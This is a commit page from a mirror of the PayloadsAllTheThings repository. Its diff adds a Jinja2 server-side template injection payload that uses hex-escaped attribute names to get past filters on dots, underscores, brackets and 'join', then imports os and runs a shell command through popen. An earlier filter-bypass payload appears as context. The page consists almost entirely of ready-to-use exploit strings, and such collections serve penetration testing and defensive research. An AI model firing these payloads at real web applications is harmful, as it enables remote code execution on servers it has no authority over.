mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
Added a new RCE payload to Jinja2 SSTI bypasses
This commit is contained in:
parent
fe4bdb0df4
commit
cc3b05017d
@ -368,6 +368,11 @@ Bypassing `|join`
|
|||||||
http://localhost:5000/?exploit={{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&f=%s%sclass%s%s&a=_
|
http://localhost:5000/?exploit={{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&f=%s%sclass%s%s&a=_
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Bypassing most common filters ('.','_','|join','[',']','mro' and 'base'):
|
||||||
|
```python
|
||||||
|
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}
|
||||||
|
```
|
||||||
|
|
||||||
## Jinjava
|
## Jinjava
|
||||||
|
|
||||||
### Basic injection
|
### Basic injection
|
||||||
|
Loading…
Reference in New Issue
Block a user